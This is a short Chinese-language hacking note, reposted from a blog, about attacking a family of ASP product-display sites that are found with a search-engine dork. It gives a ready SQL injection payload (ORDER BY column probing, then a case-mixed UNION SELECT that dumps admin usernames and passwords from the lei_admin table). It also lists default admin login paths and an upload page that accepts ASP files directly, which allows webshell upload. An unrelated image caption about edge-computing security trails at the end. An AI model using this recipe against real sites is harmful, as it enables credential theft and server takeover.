關鍵字:inurl:pro_show.asp?showid=
該程式采用楓葉通用防注入1.0asp版,此防注入完全雞肋,該類型網站程式pro_show.asp
有cookies注入或者變型注入,注入前可以先判斷一下字段數:ORdeR By xx
注入語句:ANd 1=1 UNiOn SElEcT 1,username,3,4,5,6,7,8,9,10,password,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 FrOm lei_admin
字段數看個人判斷的為準
密碼為明文和明文都有,預設背景位址:admin/index/login.asp(也有修改的)
背景上傳位址:admin/inc/upfile.htm 可直接上傳asp檔案
上傳路徑admin/upimg/
有些背景有雙檔案上傳漏洞:admin/inc/upfiletwo.asp
有些背景還有eweb編輯器
本文轉自Tar0 51CTO部落格,原文連結:http://blog.51cto.com/tar0cissp/1269470,如需轉載請自行聯系原作者
![“雲管邊端”協同的邊緣計算安全防護解決方案0 引 言1 5G 及邊緣計算2 邊緣計算面臨的風險3 “雲管邊端”安全防護技術4 “雲管邊端”安全防護實踐5 結 語[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)